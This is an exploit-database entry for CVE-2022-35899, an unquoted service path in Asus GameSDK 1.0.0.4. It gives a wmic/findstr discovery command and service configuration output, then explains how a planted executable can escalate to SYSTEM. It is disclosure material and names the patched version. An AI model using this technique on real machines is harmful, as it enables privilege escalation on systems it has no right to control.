Share
## https://sploitus.com/exploit?id=PACKETSTORM:167763
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)  
# Date: 07/14/2022  
# Exploit Author: Angelo Pio Amirante  
# Version: 1.0.0.4  
# Tested on: Windows 10  
# Patched version: 1.0.5.0  
# CVE: CVE-2022-35899  
  
  
# Step to discover the unquoted service path:  
  
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """  
  
# Info on the service:  
  
C:\>sc qc "GameSDK Service"  
[SC] QueryServiceConfig OPERAZIONI RIUSCITE  
  
NOME_SERVIZIO: GameSDK Service  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_AVVIO : 2 AUTO_START  
CONTROLLO_ERRORE : 1 NORMAL  
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe  
GRUPPO_ORDINE_CARICAMENTO :  
TAG : 0  
NOME_VISUALIZZATO : GameSDK Service  
DIPENDENZE :  
SERVICE_START_NAME : LocalSystem  
  
# Exploit  
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".  
  
# Impact  
An attacker can elevate his privileges on the system and become NTAUTHORITY\SYSTEM.  
  
# Poc Video  
  
https://youtu.be/u_8JMIgn-5g